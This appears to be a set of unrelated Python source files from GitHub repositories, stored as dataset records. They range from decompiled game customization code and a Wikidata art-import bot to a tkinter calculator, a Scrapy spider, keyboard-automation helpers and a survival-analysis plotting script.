getIGRCtrl().getRoomType()\n igrVehDescr = []\n if vehicleId in igrLayout:\n if igrRoomType in igrLayout[vehicleId]:\n igrVehDescr = igrLayout[vehicleId][igrRoomType]\n for key in igrVehDescr:\n for index in igrVehDescr[key]:\n replacedItemID = installedRawItems[key][index][0]\n replacedItemDaysLeft = installedRawItems[key][index][2]\n if replacedItemID is not None:\n self.__igrReplacedItems[_TYPE_NAME[key]][replacedItemID] = replacedItemDaysLeft\n installedRawItems[key][index] = igrVehDescr[key][index]\n\n self.__initialViewModel = (installedRawItems['emblems'], installedRawItems['inscriptions'])\n self.viewModel = [copy.deepcopy(installedRawItems['camouflages']), copy.deepcopy(installedRawItems['emblems']), copy.deepcopy(installedRawItems['inscriptions'])]\n return installedRawItems\n\n def __setInventoryItems(self):\n inventoryItems = [{}, {}, {}]\n inventoryCustomization = g_itemsCache.items.inventory.getItemsData('customizations')\n for isGold, itemsData in inventoryCustomization.iteritems():\n if itemsData:\n for key in (None, g_currentVehicle.item.intCD):\n if key not in itemsData:\n continue\n typedItemsData = itemsData[key]\n for cTypeName, items in typedItemsData.iteritems():\n cType = _TYPE_NAME[cTypeName]\n for item, itemNum in items.iteritems():\n if cType != CUSTOMIZATION_TYPE.EMBLEM:\n nationID, itemID = item\n else:\n nationID, itemID = None, item\n allowedVehicles = []\n if key is not None:\n allowedVehicles.append(key)\n if self.__cNationID == nationID or cType == CUSTOMIZATION_TYPE.EMBLEM:\n inventoryItems[cType][itemID] = [itemID,\n self.__rawItems[cType][itemID],\n None,\n isGold,\n allowedVehicles,\n [],\n (isGold, itemNum)]\n\n return inventoryItems\n\n def __fillAvailableItems(self, cType, inDossier):\n containerToFill = self.__availableItems[cType]\n groups = self.__itemGroups[cType]\n class_ = _ITEM_CLASS[cType]\n availableRawItems = self.__rawItems[cType]\n for itemID, availableRawItem in availableRawItems.iteritems():\n if cType != CUSTOMIZATION_TYPE.CAMOUFLAGE:\n if availableRawItem[7] in _g_qualifiersCache.qualifiers:\n qualifier = Qualifier(_g_qualifiersCache.qualifiers[availableRawItem[7]])\n else:\n qualifier = CamouflageQualifier('winter')\n group = groups[availableRawItem[0]]\n if len(group) == 5:\n allowedNations = None\n allowedVehicles = group[3]\n notAllowedVehicles = group[4]\n else:\n allowedNations = group[3]\n allowedVehicles = group[4]\n notAllowedVehicles = group[5]\n else:\n groupName = availableRawItem['groupName']\n qualifier = CamouflageQualifier(groupName[3:] if groupName.startswith('IGR') else groupName)\n allowedNations = None\n allowedVehicles = availableRawItem['allow']\n notAllowedVehicles = availableRawItem['deny']\n replacedByIGRItem = itemID in self.__igrReplacedItems[cType]\n isNotMigrated = itemID in self.__notMigratedItems[cType]\n containerToFill[itemID] = class_(itemID, availableRawItem, qualifier, itemID in inDossier[cType] or replacedByIGRItem or isNotMigrated, allowedVehicles, notAllowedVehicles, allowedNations, replacedByIGRItem)\n if itemID in self.__igrReplacedItems[cType]:\n containerToFill[itemID].numberOfDays = self.__igrReplacedItems[cType][itemID]\n\n return\n\n def __fillDisplayedItems(self, cType, inventoryItems):\n containerToFill = self.__displayedItems[cType]\n for itemID, availableItem in self.__availableItems[cType].iteritems():\n if availableItem.isInDossier:\n containerToFill[itemID] = availableItem\n if itemID in inventoryItems[cType]:\n availableItem.setAllowedVehicles(inventoryItems[cType][itemID][4])\n availableItem.markIsInDossier()\n if inventoryItems[cType][itemID][6][0]:\n availableItem.numberOfItems = inventoryItems[cType][itemID][6][1]\n else:\n availableItem.numberOfDays = inventoryItems[cType][itemID][6][1]\n if availableItem.isAllowedForCurrentVehicle:\n if cType == CUSTOMIZATION_TYPE.CAMOUFLAGE:\n groupName = itemID\n else:\n groupName = availableItem.getGroup()\n if itemID in inventoryItems[cType]:\n containerToFill[itemID] = availableItem\n elif self.__groupIsInShop(groupName, cType):\n containerToFill[itemID] = availableItem\n\n def __groupIsInShop(self, groupName, cType):\n return [lambda group: group not in g_itemsCache.items.shop.getCamouflagesHiddens(self.__cNationID), lambda group: group not in g_itemsCache.items.shop.getEmblemsGroupHiddens() and (group != 'group5' or self.__displayIgrItems), lambda group: group not in g_itemsCache.items.shop.getInscriptionsGroupHiddens(self.__cNationID) and (group != 'IGR' or self.__displayIgrItems)][cType](groupName)\n\n def __fillDisplayedGroups(self, cType, inDossier, inventoryItems):\n groups = []\n uniqueGroups = []\n for key, value in self.__itemGroups[cType].iteritems():\n if cType == CUSTOMIZATION_TYPE.CAMOUFLAGE:\n itemIDsInGroup = value['ids']\n groupUserName = value['userString']\n groupIsInShop = not key.startswith('IGR') or self.__displayIgrItems\n else:\n itemIDsInGroup = value[0]\n groupUserName = _ms(value[1])\n groupIsInShop = self.__groupIsInShop(key, cType)\n if groupIsInShop and key not in uniqueGroups and self.__groupIsDisplayed(key, cType):\n uniqueGroups.append(key)\n groups.append((key, groupUserName))\n for itemID in list(inDossier[cType]) + inventoryItems[cType].keys():\n if itemID in itemIDsInGroup and key not in uniqueGroups:\n uniqueGroups.append(key)\n groups.append((key, groupUserName))\n\n self.__availableGroupNames.append(groups)\n\n def __groupIsDisplayed(self, groupName, cType):\n for key, value in self.__displayedItems[cType].iteritems():\n if value.getGroup() == groupName:\n return True\n\n return False\n# okay decompyling c:\\Users\\PC\\wotsources\\files\\originals\\res\\scripts\\client\\gui\\customization_2_0\\data_aggregator.pyc \n# decompiled 1 files: 1 okay, 0 failed, 0 verify failed\n# 2015.11.18 11:52:16 Støední Evropa (bìžný èas)\n","repo_name":"webiumsk/WOT-0.9.12","sub_path":"res/scripts/client/gui/customization_2_0/data_aggregator.py","file_name":"data_aggregator.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33878530733","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nBot to import paintings from the Kroller-Muller Museum (KM)\n\nAPI is provided that can give everything in JSON format!\n\n* http://www.dimcon.nl/api/search?query=Kroller-Muller%20Museum&searchIn=all&qf=delving_hasDigitalObject_facet:true&facetBoolType=OR&format=json&start=51&rows=50\n\nUse artdatabot to upload it to Wikidata\n\n\"\"\"\nimport artdatabot\nimport pywikibot\nimport requests\n#import urllib2\nimport re\n#import HTMLParser\n#import xml.etree.ElementTree as ET\n\n\ndef getKMGenerator():\n \"\"\"\n Generator to return Kroller-Muller Museum. Keep grabbing the api until we have no more page left\n \n \"\"\"\n searchBase=u'http://www.dimcon.nl/api/search?query=Kroller-Muller%%20Museum&searchIn=all&qf=delving_hasDigitalObject_facet:true&facetBoolType=OR&format=json&start=%s&rows=%s'\n \n start = 1\n rows = 50\n hasNext = True\n\n #htmlparser = HTMLParser.HTMLParser()\n\n while hasNext:\n searchUrl = searchBase % (start, rows)\n searchPage = requests.get(searchUrl)\n searchJson = searchPage.json()\n\n start = searchJson.get(u'result').get(u'pagination').get(u'nextPage')\n hasNext = searchJson.get(u'result').get(u'pagination').get(u'hasNext')\n\n for item in searchJson.get(u'result').get(u'items'):\n itemfields = item.get('item').get(u'fields')\n metadata = {}\n #print itemfields\n\n if itemfields.get('delving_collection')[0]==u'Kroller-Muller Museum':\n metadata['collectionqid'] = u'Q1051928'\n metadata['collectionshort'] = u'KM'\n metadata['locationqid'] = u'Q1051928'\n else:\n #Another collection, skip\n continue\n\n if itemfields.get('dc_subject')[0].startswith(u'schilderkunst'):\n metadata['instanceofqid'] = u'Q3305213' #This is painting, let's do sculptures too?\n # Mind the description if we add sculptures!!!!!\n else:\n #Not a painting, skip\n continue\n\n if itemfields.get('europeana_uri')[0].startswith(u'kroller-muller/'):\n metadata['url'] = u'http://dimcon.nl/dimcon/%s' % (itemfields.get('europeana_uri')[0],)\n else:\n #No url, skip\n continue\n\n if itemfields.get('dc_identifier')[0].startswith(u'KM '):\n metadata['id'] = itemfields.get('dc_identifier')[0]\n metadata['idpid'] = u'P217'\n else:\n #Something wrong with this id, skip\n continue \n \n metadata['title'] = { u'nl' : itemfields.get('dc_title')[0],\n }\n metadata['inception'] = itemfields.get('dc_date')[0]\n metadata['describedbyurl'] = itemfields.get('delving_landingPage')[0] # .replace(u'%20', u' ')\n\n name = itemfields.get('dc_creator')[0]\n nameRegex = u'^([^\\(]+)\\s\\([^\\)]+\\)$'\n nameMatch = re.match(nameRegex, name)\n if nameMatch:\n metadata['creatorname'] = nameMatch.group(1)\n else:\n metadata['creatorname'] = name\n \n metadata['description'] = { u'nl' : u'%s van %s' % (u'schilderij', metadata.get('creatorname'),),\n u'en' : u'%s by %s' % (u'painting', metadata.get('creatorname'),),\n }\n #print metadata\n yield metadata\n\ndef main():\n dictGen = getKMGenerator()\n\n #for painting in dictGen:\n # print painting\n\n artDataBot = artdatabot.ArtDataBot(dictGen, create=True)\n artDataBot.run()\n \n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"multichill/toollabs","sub_path":"bot/wikidata/km_import.py","file_name":"km_import.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"5583902859","text":"import tkinter\nfrom assets import styles\n\nclass CalculatorScreen(tkinter.Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n self.configure(background=styles.BACKGROUND)\n self.controller = controller\n\n self.content_buttons = [\n '(',')','CE','AC',\n '7','8','9','/',\n '4','5','6','*',\n '1','2','3','-',\n '0','.','=','+',\n ]\n\n self.content_screen = tkinter.StringVar()\n self.show_operation = ''\n\n self.create_widgets()\n \n def solve_operation(self):\n try:\n res = eval(self.show_operation)\n res = str(res)\n except SyntaxError:\n res = 'Syntax error'\n self.show_operation = res\n\n def clic_button(self, content: str):\n if content == self.content_buttons[3]: self.show_operation = ''\n elif content == self.content_buttons[2]: self.show_operation = self.show_operation[:-1]\n elif content == self.content_buttons[18]: self.solve_operation()\n else: self.show_operation += content \n self.content_screen.set(self.show_operation)\n\n def back_menu(self):\n self.content_screen.set('')\n self.show_operation = ''\n self.controller.show_frame('MenuGames')\n\n def create_widgets(self):\n tkinter.Label(self, text='Calculadora', **styles.TITLES).grid(column=0, row=0)\n tkinter.Entry(self,textvariable=self.content_screen, font=('sans serif', 16)).grid(column=0, row=1, sticky=tkinter.NSEW)\n\n buttons = tkinter.Frame(self)\n buttons.grid(column=0, row=2, sticky=tkinter.NSEW)\n c = 0\n r = 0\n for button in range(len(self.content_buttons)):\n tkinter.Button(buttons, \n text=self.content_buttons[button], \n width=5,\n height=3,\n command=lambda con=self.content_buttons[button]: self.clic_button(con)).grid(\n column=c,\n row=r,\n sticky=tkinter.NSEW)\n c += 1\n if c == 4:\n r += 1\n c = 0\n \n tkinter.Button(self, text='тПо', command=self.back_menu).grid(column=0, row=3, sticky=tkinter.NSEW)\n \n self.grid_columnconfigure(0, weight=1)\n for c in range(0, 4):\n buttons.grid_columnconfigure(c, weight=1)\n","repo_name":"Juanchoner/Mini-Games","sub_path":"Calculator/Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32631288026","text":"\"\"\"AoC 13, 2022.\"\"\"\n\n# Standard library imports\nimport pathlib\nimport sys\nimport ast\nimport numpy as np\n\ndef parse_data(puzzle_input):\n \"\"\"Parse input.\"\"\"\n return([[ast.literal_eval(l) for l in line.split(\"\\n\")] for line in puzzle_input.split(\"\\n\\n\")])\n \ndef compare(data_pair):\n element_0, element_1 = data_pair\n order = None\n \n for i in range(len(element_0)):\n order = None\n \n try:\n a = element_0[i]\n b = element_1[i]\n if type(a)==int and type(b)==int:\n if ab:\n order=False\n else:\n if type(a)==int:\n # convert to list\n a = [a]\n if type(b)==int:\n # convert to list\n b = [b]\n order = compare([a,b])\n except IndexError:\n order=False\n if order is not None:\n break\n \n if order is None:\n if len(element_0) 10**(-12):\n mid = (ok+ng)/2\n v = a*mid + b*math.sin(c*mid*math.pi)\n if v < 100.0:\n ok = mid\n else:\n \tng = mid\nprint(ok)","repo_name":"nami4mo/competitive-programming-problems","sub_path":"practice/abc001-041/abc026_d.py","file_name":"abc026_d.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42129091602","text":"import logging\n\nimport structlog\n\n\ndef configure_logging():\n logging.basicConfig()\n structlog.configure(\n processors=[\n structlog.stdlib.filter_by_level,\n structlog.stdlib.add_logger_name,\n structlog.stdlib.add_log_level,\n structlog.processors.TimeStamper(fmt=\"%Y-%m-%d %H:%M:%S.%f\"),\n structlog.processors.JSONRenderer(sort_keys=True),\n ],\n logger_factory=structlog.stdlib.LoggerFactory(),\n wrapper_class=structlog.stdlib.BoundLogger,\n cache_logger_on_first_use=True,\n )\n\n logger = structlog.wrap_logger(logging.getLogger(\"\"))\n logger.setLevel(logging.DEBUG)\n","repo_name":"caulagi/serverless-python-rds-cron","sub_path":"src/logconfig.py","file_name":"logconfig.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17777449736","text":"import cadquery as cq\nfrom cadquery import Workplane as WP\n\ndef scale(workplane: WP, x: float, y: float = None, z: float = None) -> WP:\n if y== None: y = x\n if z== None: z = x\n t = cq.Matrix([\n [x, 0, 0, 0],\n [0, y, 0, 0],\n [0, 0, z, 0],\n [0, 0, 0, 1]\n ])\n return workplane.newObject([\n o.transformGeometry(t) if isinstance(o, cq.Shape) else o\n for o in workplane.objects\n ])\n\na = WP().box(1,1,1)\nb = scale(a,1,2,3)\nc= scale(a,3)","repo_name":"sprightlyManifesto/cadQuery2","sub_path":"scaling.py","file_name":"scaling.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"24089954288","text":"import scrapy\nimport requests\nfrom copy import deepcopy\n\nclass AmazonSpider(scrapy.Spider):\n name = 'amazon'\n # allowed_domains = ['www.amazon.com']\n start_urls = ['https://www.amazon.cn/b?ie=UTF8&node=42689071&ref_=sa_menu_top_pc_l1']\n\n def parse(self, response,*args,**kwargs):\n li_list = response.xpath('//div[@class=\"left_nav browseBox\"]/ul/li')\n for li in li_list:\n item = {}\n item['cate'] = li.xpath('./a/text()').extract_first()\n item['cate_url'] = response.urljoin(li.xpath('./a/@href').extract_first())\n yield scrapy.Request(\n url=item['cate_url'],\n callback=self.parse_detail_cate,\n meta={'item':deepcopy(item)}\n )\n\n def parse_detail_cate(self, response):\n item = deepcopy(response.meta['item'])\n li_list = response.xpath('//div[@id=\"mainResults\"]/ul/li')\n data = response.xpath('//div[@data-index > -1]')[:-2]\n\n # print(item['cate'],len(li_list))\n if li_list:\n # 第一页\n for li in li_list:\n item['product_name'] = li.xpath('./div/div[3]//h2/text() | ./div/div/div/div[2]/div[1]/div[1]/a/h2/text()').extract_first()\n item['product_price'] = li.xpath('./div/div[5]//a/span[2]/text() | ./div/div/div/div[2]/div[2]/div[1]/div/a/span[2]/text()').extract_first()\n item['product_url'] = li.xpath('./div/div[3]/div[1]/a/@href | ./div/div/div/div[2]/div[1]/div[1]/a/@href').extract_first()\n yield item\n # 翻页 div[contains(@class,\"a\")\n next_url = response.urljoin(response.xpath('//a[contains(@title,\"下一页\")]/@href').extract_first())\n if next_url:\n yield scrapy.Request(\n url=next_url,\n callback=self.parse_detail_cate,\n meta={'item':{'cate':item['cate'],'cate_url':item['cate_url']}}\n )\n elif data:\n\n div_list = response.xpath('//div[@data-index > -1]')[:-2]\n for div in div_list: # a-size-medium s-inline s-access-title a-text-normal\n item['product_name'] = div.xpath('.//span[@class=\"a-size-base-plus a-color-base a-text-normal\"]/text() | .//span[@class=\"a-size-medium a-color-base a-text-normal\"]/text() | .//h2[@class=\"a-size-medium s-inline s-access-title a-text-normal\"]/text()').extract_first()\n item['product_price'] = div.xpath('.//span[@class=\"a-price-whole\"]/text()').extract_first()\n item['product_url'] = response.urljoin(div.xpath('.//h2[@class=\"a-size-mini a-spacing-none a-color-base s-line-clamp-4\"]/a/@href | .//a[@class=\"a-link-normal a-text-normal\"]/@href').extract_first())\n yield item\n\n # 翻页\n next_url = response.urljoin(response.xpath('//a[contains(text(),\"下一页\")]/@href').extract_first())\n yield scrapy.Request(\n url=next_url,\n callback=self.parse_detail_cate,\n meta={'item':{'cate':item['cate'],'cate_url':item['cate_url']}}\n )","repo_name":"Tao00612/amazonpro","sub_path":"amazonpro/spiders/amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22391913315","text":"from django.urls import path \nfrom . import views\nfrom django.conf.urls.static import static\n# from django.conf import settings\n\nurlpatterns = [\n path('', views.main_page, name='home'),\n path('add_note/', views.add_note, name='add_note'),\n path('submit/', views.submit_words_handler, name='submit_words_handler'),\n path('edit//', views.edit_page, name='change_page'),\n path('registration/', views.registration_user, name='registration'), # регистрация\n path('login/', views.login_user, name='login'), # для зареганного\n path('logout/', views.logout_user, name='logout'), # для выхода\n path('delete/', views.delete_page, name='delete'), # для выхода\n]","repo_name":"EnglishWordRepeater/Django_files","sub_path":"word_rep__app/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71730863161","text":"from collections import deque\nn,m,k,x=4,4,1,1\ngraph=[\n [],\n [2,3],\n [3,4],\n [],\n []\n]\nvisited=[-1]*(n+1)\nq=deque()\ndef bfs(v):\n q.append(v)\n visited[v]=0\n while q:\n now=q.popleft()\n for i in graph[now]:\n if visited[i]==-1:\n q.append(i)\n visited[i]=visited[now]+1\nbfs(x)\nflag=False\nfor i in range(n+1):\n if visited[i]==k:\n print(i)\n flag=True\nif flag==False:\n print(-1)\n\n","repo_name":"Yoo-sumi/CodingTest","sub_path":"DFS_BFS_Review/Q15.py","file_name":"Q15.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2981672329","text":"from PyQt5.QtCore import QSize\nfrom PyQt5.QtWidgets import QTabBar, QToolButton\n\nfrom rare.utils.misc import icon\n\n\nclass MainTabBar(QTabBar):\n def __init__(self, parent=None):\n super(MainTabBar, self).__init__(parent=parent)\n self.setObjectName(\"MainTabBar\")\n font = self.font()\n font.setPointSize(font.pointSize() + 2)\n font.setBold(True)\n self.setFont(font)\n self.expanded = -1\n\n def tabSizeHint(self, index):\n size = super(MainTabBar, self).tabSizeHint(index)\n if index == self.expanded:\n offset = self.width()\n for index in range(self.count()):\n offset -= super(MainTabBar, self).tabSizeHint(index).width()\n size.setWidth(max(size.width(), size.width() + offset))\n return size\n\n\nclass TabButtonWidget(QToolButton):\n def __init__(self, button_icon: str, tool_tip: str, fallback_icon=None, parent=None):\n super(TabButtonWidget, self).__init__(parent=parent)\n self.setText(\"Icon\")\n self.setPopupMode(QToolButton.InstantPopup)\n self.setIcon(icon(button_icon, fallback_icon, scale_factor=1.25))\n self.setToolTip(tool_tip)\n self.setIconSize(QSize(25, 25))\n","repo_name":"Dummerle/Rare","sub_path":"rare/components/tabs/tab_widgets.py","file_name":"tab_widgets.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"40"} +{"seq_id":"35994024742","text":"import os\nimport psutil\nfrom config import M\nfrom config import PARAMS\nfrom window_impl import get_sogou_virtualkeyboard_window, get_virtualkeyboard_candarea\nimport time\nfrom keys import do, space, Enter, BackSpace, ctrl, shift\n\nstr9key = '123456789'\nstr26key = 'qwertyuiopasdfghjklzxcvbnm'\nsogou_virtual_keyboard_info = PARAMS['sogou_virtual_keyboard']\npinyin_26key_btn_pos_info = sogou_virtual_keyboard_info['pinyin_26key_btn_pos_info']\npinyin_9key_btn_pos_info = sogou_virtual_keyboard_info['pinyin_9key_btn_pos_info']\nkeyboard_layout = {}\n\n\ndef get_process_info(proc):\n pids = psutil.pids()\n pid = None\n for p in pids:\n try:\n p_name = psutil.Process(p)\n if p_name.name() == proc:\n pid = p_name.pid\n break\n except:\n pass\n return pid\n\n\ndef start_edit(proc):\n os.popen(proc)\n time.sleep(2)\n\n\ndef close_edit(proc):\n pid = get_process_info(proc)\n if pid:\n try:\n cmd = \"kill -9 \" + str(pid)\n os.popen(cmd)\n except:\n pass\n\n\ndef key_input(pinyin):\n if not pinyin or pinyin == '':\n return 0\n if pinyin == '*':\n do(BackSpace)\n time.sleep(0.01)\n return 0\n elif pinyin == '#':\n do(Enter)\n time.sleep(0.01)\n return 0\n elif pinyin == '&':\n do(space)\n time.sleep(0.01)\n return 0\n else:\n pinyin = pinyin.lower()\n do(pinyin)\n time.sleep(0.01)\n return 1\n\n\ndef delete_pinyin(pinyin):\n if not pinyin or pinyin == '':\n return\n else:\n for i in range(0, len(pinyin)):\n do(BackSpace)\n time.sleep(0.01)\n do(space)\n\n\ndef ctrl_shift():\n do(ctrl+shift)\n time.sleep(1)\n\n\ndef init_virtualkey_layout():\n global keyboard_layout\n for key in sogou_virtual_keyboard_info:\n if key == 'pinyin_9key_btn_pos_info':\n keyPosInfo = sogou_virtual_keyboard_info['pinyin_9key_btn_pos_info']\n keyNameStr = str9key\n interval = keyPosInfo['interval']\n keyBtnPos = keyPosInfo['key_btn_pos']\n lastPosX, lastPosY = 0, 0\n for i in range(len(keyNameStr)):\n single_btn = {}\n keyName = keyNameStr[i]\n if keyName not in keyBtnPos:\n btn_coord = (lastPosX + interval, lastPosY)\n else:\n btn_coord = keyBtnPos[keyName]\n lastPosX = btn_coord[0]\n lastPosY = btn_coord[1]\n keyboard_layout[keyName] = btn_coord\n elif key == 'pinyin_26key_btn_pos_info':\n keyPosInfo = sogou_virtual_keyboard_info['pinyin_26key_btn_pos_info']\n keyNameStr = str26key\n interval = keyPosInfo['interval']\n keyBtnPos = keyPosInfo['key_btn_pos']\n lastPosX, lastPosY = 0, 0\n for i in range(len(keyNameStr)):\n single_btn = {}\n keyName = keyNameStr[i]\n if keyName not in keyBtnPos:\n btn_coord = (lastPosX + interval, lastPosY)\n else:\n btn_coord = keyBtnPos[keyName]\n lastPosX = btn_coord[0]\n lastPosY = btn_coord[1]\n keyboard_layout[keyName] = btn_coord\n else:\n keyboard_layout[key] = sogou_virtual_keyboard_info[key]\n\n\ndef virtualkey_click_event(key_name, box):\n # box = get_sogou_virtualkeyboard_window('Sogou')\n click_button = (int(box.x + box.width * keyboard_layout[key_name][0]),\n int(box.y + box.height * keyboard_layout[key_name][1]))\n M.click(click_button[0], click_button[1])\n\n\ndef virtualkey_input(pinyin, keyboardtype):\n if not pinyin or pinyin == '':\n return 0\n box = get_sogou_virtualkeyboard_window('Sogou')\n if pinyin == '*':\n virtualkey_click_event('backspace_' + str(keyboardtype), box)\n time.sleep(0.01)\n return 0\n elif pinyin == '#':\n virtualkey_click_event('enter_' + str(keyboardtype), box)\n time.sleep(0.01)\n return 0\n elif pinyin == '&':\n # virtualkey_click_event('Space_' + str(keyboardtype), box)\n time.sleep(0.01)\n return 2\n else:\n if str(keyboardtype).endswith('eng'):\n for p in pinyin:\n if p.isupper():\n virtualkey_click_event('shift_26', box)\n time.sleep(0.005)\n virtualkey_click_event(p.lower(), box)\n else:\n virtualkey_click_event(p, box)\n time.sleep(0.005)\n time.sleep(0.01)\n else:\n pinyin = pinyin.lower()\n for i in range(0, len(pinyin)):\n virtualkey_click_event(pinyin[i], box)\n time.sleep(0.005)\n time.sleep(0.01)\n return 1\n\n\ndef virtualkey_delete_pinyin(pinyin, keyboardtype):\n if not pinyin or pinyin == '':\n return\n else:\n box = get_sogou_virtualkeyboard_window('Sogou')\n for i in range(0, len(pinyin)):\n virtualkey_click_event('backspace_' + keyboardtype, box)\n time.sleep(0.005)\n\n\ndef virtualkey_click_cand(cand_list, index, name='Sogou'):\n cand_area = get_virtualkeyboard_candarea(name)\n width = cand_area[2] - cand_area[0]\n height = cand_area[3] - cand_area[1]\n posX = cand_list[index - 1]['pos']\n click_btn = (int(cand_area[0] + width * posX), int(cand_area[1] + height / 2))\n M.click(click_btn[0], click_btn[1])\n time.sleep(0.01)\n\n\ndef virtualkey_switch_keyboardtype(keyboard_type):\n box = get_sogou_virtualkeyboard_window('Sogou')\n virtualkey_click_event('switch_keyboard', box)\n time.sleep(1)\n if str(keyboard_type).endswith('key'):\n virtualkey_click_event(keyboard_type, box)\n elif str(keyboard_type).startswith('26') and str(keyboard_type).endswith('eng'):\n virtualkey_click_event('26key_eng', box)\n else:\n virtualkey_click_event(str(keyboard_type) + 'key', box)\n time.sleep(1)\n","repo_name":"mayuxing-git/Myuxing","sub_path":"EvaluationWithOCRForLinux/fake_input.py","file_name":"fake_input.py","file_ext":"py","file_size_in_byte":6066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71062615159","text":"from os import walk\nimport pandas as pd\nfrom tqdm import tqdm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os\n\nfrom lifelines import KaplanMeierFitter\n\nfrom lifelines import statistics as stats\n\ndef expand_across_timeline(df, main_name, total_size):\n pre_df = {\"Timeline\": [], main_name: [], f\"{main_name}_lower_0.95\": [], f\"{main_name}_upper_0.95\": []}\n prev_t = int(df[\"Timeline\"].iloc[0])\n prev_s = df[main_name].iloc[0]\n prev_l = df[f\"{main_name}_lower_0.95\"].iloc[0]\n prev_u = df[f\"{main_name}_upper_0.95\"].iloc[0]\n for i, row in df.iterrows():\n if i == 0:\n continue\n\n curr_t = int(row[\"Timeline\"])\n curr_s = row[main_name]\n curr_l = row[f\"{main_name}_lower_0.95\"]\n curr_u = row[f\"{main_name}_upper_0.95\"]\n\n multiplier = curr_t - prev_t\n\n pre_df[\"Timeline\"].extend(list(range(prev_t, prev_t + multiplier)))\n pre_df[main_name].extend([prev_s] * multiplier)\n pre_df[f\"{main_name}_lower_0.95\"].extend([prev_l] * multiplier)\n pre_df[f\"{main_name}_upper_0.95\"].extend([prev_u] * multiplier)\n\n prev_t = curr_t\n prev_s = curr_s\n prev_l = curr_l\n prev_u = curr_u\n \n missing_mult = total_size + 1 - len(pre_df[\"Timeline\"])\n pre_df[\"Timeline\"].extend(list(range(prev_t, prev_t + missing_mult)))\n pre_df[main_name].extend([prev_s] * missing_mult)\n pre_df[f\"{main_name}_lower_0.95\"].extend([prev_l] * missing_mult)\n pre_df[f\"{main_name}_upper_0.95\"].extend([prev_u] * missing_mult)\n return pd.DataFrame(pre_df)\n \n\n\n\ndef str_percentage_to_float(percentage):\n try:\n return float(percentage[:-1]) / 100\n except:\n return -1\n\ndef get_lifelines_format(df):\n indices = df[\"Index\"]\n died = df[\"Died\"]\n censored = df[\"Lost to Follow-up\"]\n final_index = -1 if len(indices) == 0 else indices.iloc[-1]\n \n T = []\n E = []\n \n for ((_, index), (_, cur_death), (_, cur_censored)) in zip(indices.iteritems(), died.iteritems(), censored.iteritems()):\n \n if index == final_index:\n cur_censored += df[\"Start\"].iloc[-1]\n \n T.extend([index] * (cur_death + cur_censored))\n E.extend([1] * cur_death + [0] * cur_censored)\n \n return pd.DataFrame({\"T\": T, \"E\": E})\n\nfor _, _, filenames in walk(snakemake.input[0]):\n filenames = filenames\n \npd_dict = {}\npd_dict_non_kmf = {}\n\nfor filename in tqdm(filenames):\n if filename[-3:] != \"csv\":\n continue\n splitted = filename.split(\"~\")\n flag = splitted[0]\n cancer = \"~\".join(splitted[1:-1])\n \n if cancer not in pd_dict:\n pd_dict[cancer] = {}\n pd_dict_non_kmf[cancer] = {}\n temp_df = pd.read_csv(f\"{snakemake.input[0]}/{filename}\", converters={\"Observed Cum\": str_percentage_to_float}, thousands=\",\")\n #temp_df = temp_df[temp_df[\"Observed Cum\"] != -1]\n temp_df = temp_df.astype({\"Died\": \"int32\", \"Lost to Follow-up\": \"int32\", \"Start\": \"int32\"})\n lifelines_format = get_lifelines_format(temp_df)\n \n pd_dict[cancer][flag] = (lifelines_format, temp_df.shape[0])\n\n\nlast_survival = {}\nos.makedirs(snakemake.output[0], exist_ok=True)\nfor cancer, v in tqdm(pd_dict.items()):\n\n \n\n plt.clf()\n kmf = KaplanMeierFitter()\n fig, ax = plt.subplots()\n \n for flag, (cur_df, size) in v.items():\n if cur_df.shape[0] == 0:\n continue\n kmf.fit(cur_df[\"T\"], event_observed=cur_df[\"E\"], label=flag)\n kmf.plot_survival_function(ax=ax)\n if cancer not in last_survival:\n last_survival[cancer] = {}\n temp_df = pd.concat([kmf.survival_function_, kmf.confidence_interval_], axis = 1)\n temp_df[\"Timeline\"] = kmf.timeline\n last_survival[cancer][flag] = expand_across_timeline(temp_df, flag, size)\n \n \n \"\"\"for cancer, sub_flag in cur_last_survival.items():\n for flag, surv_df in sub_flag.items():\"\"\"\n \n plt.savefig(f\"{snakemake.output[0]}/{cancer}.png\", dpi=600, bbox_inches=\"tight\")\n\nos.makedirs(snakemake.output[1], exist_ok=True)\nos.makedirs(snakemake.output[2], exist_ok=True)\nfor cur_cancer, flag_dict in last_survival.items():\n os.makedirs(f\"{snakemake.output[1]}/{cur_cancer}\", exist_ok=True)\n os.makedirs(f\"{snakemake.output[2]}/{cur_cancer}\", exist_ok=True)\n for cur_flag, cur_df in flag_dict.items():\n cur_df.to_csv(f\"{snakemake.output[1]}/{cur_cancer}/{cur_flag}.csv\", index=False)\n pd_dict[cur_cancer][cur_flag][0].to_csv(f\"{snakemake.output[2]}/{cur_cancer}/{cur_flag}.csv\", 